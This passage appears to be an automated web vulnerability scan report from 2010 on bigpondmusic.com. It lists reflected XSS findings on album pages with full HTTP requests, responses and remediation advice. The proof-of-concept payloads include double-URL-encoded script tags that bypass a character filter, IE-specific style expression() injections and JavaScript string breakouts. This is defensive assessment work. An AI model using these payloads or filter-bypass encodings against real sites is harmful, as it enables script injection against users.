Path:   /album/uriah-heep/the-collection91

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1 was submitted in the REST URL parameter 1. This input was echoed as 4fd5c"><script>alert(1)</script>4ad0e09dbc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1/uriah-heep/the-collection91 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album4fd5c"><script>alert(1)</script>4ad0e09dbc1/uriah-heep/the-collection91" />
...[SNIP]...

2.149. http://bigpondmusic.com/album/uriah-heep/the-collection91 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8ad'%3b2757a09f366 was submitted in the REST URL parameter 1. This input was echoed as 1b8ad';2757a09f366 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1b8ad'%3b2757a09f366/uriah-heep/the-collection91 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87833


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1b8ad';2757a09f366';
   s.prop4 = 'uriah-heep';
   s.prop5 = 'the-collection91';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.150. http://bigpondmusic.com/album/uriah-heep/the-collection91 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 was submitted in the h parameter. This input was echoed as a909e"style="x:expression(alert(1))"8131f1c8632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/uriah-heep/the-collection91?h=624650163a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 127967


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Uriah Heep - The Collection
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/uriah-heep/the-collection91?h=624650163a909e"style="x:expression(alert(1))"8131f1c8632" />
...[SNIP]...

2.151. http://bigpondmusic.com/album/uriah-heep/the-collection91 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc95e"style="x:expression(alert(1))"7a852546fd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/uriah-heep/the-collection91?bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 127948


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Uriah Heep - The Collection
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/uriah-heep/the-collection91?bc95e"style="x:expression(alert(1))"7a852546fd8=1" />
...[SNIP]...

2.152. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1289'%3be26bc6beb3c was submitted in the REST URL parameter 1. This input was echoed as a1289';e26bc6beb3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albuma1289'%3be26bc6beb3c/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88032


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albuma1289';e26bc6beb3c';
   s.prop4 = 'various-artists';
   s.prop5 = 'he-will-have-his-way-the-songs-of-tim-neil-finn';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1=
...[SNIP]...

2.153. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902 was submitted in the REST URL parameter 1. This input was echoed as 1bc4c"><script>alert(1)</script>852e427d902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88368


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album1bc4c"><script>alert(1)</script>852e427d902/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn" />
...[SNIP]...

2.154. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe325"style="x:expression(alert(1))"c690ff87c07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style%3d"x%3aexpression(alert(1))"c690ff87c07=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 132595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - He Will Ha
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn?fe325"style="x:expression(alert(1))"c690ff87c07=1" />
...[SNIP]...

2.155. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [CID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 was submitted in the CID parameter. This input was echoed as f8b5a"style="x:expression(alert(1))"bce27fd6229 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style%3d"x%3aexpression(alert(1))"bce27fd6229 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 153503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - So Fresh T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?CID=ZBP_MUS_sofresh2011_100x70_221110f8b5a"style="x:expression(alert(1))"bce27fd6229" />
...[SNIP]...

2.156. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ad01'%3be08d6c44f91 was submitted in the REST URL parameter 1. This input was echoed as 7ad01';e08d6c44f91 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album7ad01'%3be08d6c44f91/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88263


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album7ad01';e08d6c44f91';
   s.prop4 = 'various-artists';
   s.prop5 = 'so-fresh-the-hits-of-summer-2011-the-best-of-2010';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier
...[SNIP]...

2.157. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4 was submitted in the REST URL parameter 1. This input was echoed as 754d1"><script>alert(1)</script>4db73f5a8a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album754d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4db73f5a8a4/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88092


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album754d1"><script>alert(1)</script>4db73f5a8a4/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010" />
...[SNIP]...

2.158. http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1bfcd"style="x:expression(alert(1))"22a4ca4833e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style%3d"x%3aexpression(alert(1))"22a4ca4833e=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:17:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 153233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Various Artists - So Fresh T
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/various-artists/so-fresh-the-hits-of-summer-2011-the-best-of-2010?1bfcd"style="x:expression(alert(1))"22a4ca4833e=1" />
...[SNIP]...

2.159. http://bigpondmusic.com/album/various-artists/weekend-songs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/weekend-songs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1 was submitted in the REST URL parameter 1. This input was echoed as 965ed"><script>alert(1)</script>d0c19fa9bd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album965ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c19fa9bd1/various-artists/weekend-songs HTTP/1.1
